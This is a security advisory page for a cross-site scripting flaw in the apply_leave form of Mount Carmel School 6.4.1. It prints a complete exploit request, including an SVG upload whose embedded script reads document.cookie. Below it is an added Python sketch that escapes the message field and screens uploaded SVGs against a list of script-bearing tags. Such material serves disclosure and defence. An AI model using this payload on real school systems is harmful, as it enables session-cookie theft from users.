
2023 Mount Carmel School 6.4.1 Cross Site Scripting

16 Oct 2023 | Reported by nu11secur1ty | Type: packetstorm | Source: packetstormsecurity.com

High-severity vulnerability in Mount Carmel School allows HTML and JavaScript injection via the apply_leave function.

Code
`## Title: 2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction  
## Author: nu11secur1ty  
## Date: 10/14/2023  
## Vendor: https://smart-school.in/  
## Software: https://demo.smart-school.in/site/userlogin#  
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected  
  
  
## Description:  
A user can manipulate the system by injecting HTML code into it  
without any restriction.  
The apply_leave function does not sanitize its input correctly. This could  
allow a user to inject HTML or JavaScript into the application for  
malicious purposes.  
  
  
STATUS: HIGH - Vulnerability  
  
[+]Exploit:  
```HTML  
POST /user/apply_leave/add HTTP/1.1  
Host: demo.smart-school.in  
Cookie: ci_session=495u2fpup87iml75p4us2uuqgqkpsof9  
Content-Length: 1492  
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"  
Accept: application/json, text/javascript, */*; q=0.01  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5wuzslDN9siOCW0K  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.smart-school.in  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.smart-school.in/user/apply_leave  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="homework_id"  
  
  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="apply_date"  
  
10/14/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="from_date"  
  
09/27/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="to_date"  
  
09/29/2023  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="leave_id"  
  
  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="message"  
  
<a href="https://www.youtube.com/watch?v=yPuC4Cy2ZuI" target="_blank"  
rel="noopener nofollow ugc">  
<img src="https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/chalga-tochilka.gif"  
style="border:1px solid black;max-width:100%;" alt="Photo of Byron  
Bay, one of Australia's best beaches!">  
------WebKitFormBoundary5wuzslDN9siOCW0K  
Content-Disposition: form-data; name="files[]"; filename="kurec.svg"  
Content-Type: image/svg+xml  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"  
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
<script type="text/javascript">  
alert(document.cookie);  
</script>  
</svg>  
  
------WebKitFormBoundary5wuzslDN9siOCW0K--  
  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/smart-school.in/2023/Mount-Carmel-School-6.4.1)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/10/2023-mount-carmel-school-641-xss.html)  
  
## Time spent:  
00:37:00  
  
  
`
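
The two controls that the request above gets past, shown as an added example in Python (not code from the advisory or from the vendor): output-encoding the `message` field, and screening an uploaded SVG for active content before it is accepted. The function names, the tag list and the sample inputs are constructed for illustration.

```python
import html
import re
import xml.etree.ElementTree as ET

# Constructed samples modelled on the "message" and "files[]" parts of the request.
SAMPLE_MESSAGE = '<a href="https://example.com/"><img src="https://example.com/x.gif"></a>'
SAMPLE_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
  <script type="text/javascript">alert(document.cookie);</script>
</svg>"""
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0"/></svg>'

# Elements that can run script or embed foreign documents (assumed policy, not exhaustive).
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}


def render_message(message: str) -> str:
    """Encode the stored message for an HTML text context so markup is shown, not parsed."""
    return html.escape(message, quote=True)


def local(name: str) -> str:
    """Strip an XML namespace ('{ns}tag' -> 'tag') and lowercase the result."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes) -> list[str]:
    """Return reasons to reject an uploaded SVG; an empty list means none were found."""
    # Refuse DTDs before parsing: a plain image does not need them.
    if re.search(rb"<!(DOCTYPE|ENTITY)", data, re.I):
        return ["doctype-or-entity"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not-well-formed"]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"element:{tag}")
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):  # onload, onclick, ...
                findings.append(f"handler:{name}")
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("url:javascript")
    return findings
```

Screening of this kind is a denylist and only one layer; serving user uploads with `Content-Disposition: attachment` or from a separate origin keeps any script that slips through out of the application's session context.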

Vulners AI Score: 7.1 (High risk)